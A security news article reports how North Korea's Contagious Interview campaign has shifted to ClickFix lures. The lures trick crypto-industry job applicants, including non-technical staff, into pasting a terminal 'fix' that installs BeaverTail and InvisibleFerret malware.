For years, the Democratic People’s Republic of Korea (DPRK or North Korea) “Contagious Interview” campaign relied on fake developer job postings to lure targets into running malware like BeaverTail and InvisibleFerret. It has recently evolved.
The DPRK government hacking collective, which has codenames including Lazarus and Hidden Cobra, has for several years targeted crypto companies, protocols, and holders, as theft targets. They are behind some of the largest crypto heists in history, but are known for casting a wide net and having a variety of hacking methods, targeting big and little fish. They have become well-known for their malware deployment infrastructure, which targets victims looking for jobs at crypto companies. Once a victim is duped into applying for a fake job, the trap is set.
Victims would be tricked into uploading a fake “introductory video” and, after encountering a false microphone error, are told to paste a “quick fix” command into their terminal. This command quietly delivered malware that gave attackers remote access and let them siphon sensitive data and crypto funds.
But in late May 2025, researchers observed a major shift. According to GitLab security researcher Oliver Smith, the ClickFix variant now uses the same technique to target cryptocurrency trader roles, marketing and sales positions at Web3 organizations, and even staff at a U.S. e-commerce retailer.
This means non-technical employees — people far less likely to suspect a terminal “fix” command — are now firmly in the hackers’ crosshairs.
Unlike older lures, ClickFix targets people with interview tasks like uploading files or joining a call. When the system generates a fake microphone or camera error, victims are told to paste a short terminal command as a “solution.” That one step silently installs BeaverTail malware, which enables full device compromise and crypto theft.
Red Flags to Watch For:
This new wave of hacks is dangerous as it evidences:
BeaverTail functions as a downloader/infostealer that can harvest browser-stored credentials and cryptocurrency wallet data and then pull down InvisibleFerret, a Python backdoor for persistence and remote control. Palo Alto Networks’ Unit 42 has tracked a Qt-based, cross-platform BeaverTail build and documented targeting of 13 crypto wallet extensions.
The broader cluster—linked to Lazarus and related DPRK activity—has also abused open-source registries. Datadog Security Labs tied malicious npm packages to BeaverTail within the Contagious Interview ecosystem. Sekoia’s March 2025 reporting describes a “ClickFake Interview” variant that deploys backdoors on both Windows and macOS while shifting targets beyond developers.
DPRK’s crypto operations are not theoretical. In February 2025, the FBI issued a PSA attributing the $1.5 billion Bybit theft to DPRK actors known as TraderTraitor, underscoring the scale and sophistication of state-directed financial cybercrime.
The U.S. government has long warned the crypto sector about DPRK tradecraft (e.g., CISA AA22-108A), and OFAC maintains sanctions on DPRK cyber units and facilitators.
For Web3 employers, the target profile expansion (marketing, sales, trading) widens the attack surface to teams that may lack secure-coding instincts or hardened dev environments. For individuals, the one-liner “fix” during a live interview remains a potent social-engineering trick—especially when paired with compiled payloads that avoid interpreter dependencies and some detections.
The latest findings show North Korea’s hacker units are not standing still. They are expanding beyond developers, refining their malware with ClickFix lures, and sustaining activity by rapidly replacing their infrastructure.
For the crypto industry, the lesson is clear: security is no longer just an IT problem. Every employee, every applicant, and even investors themselves are potential targets. Organizations that fail to adapt their defenses risk becoming the next headline.
Also read: Stablecoin Issuer Tether Seeks Half-Trillion Valuation In Ambitious Capital Raise
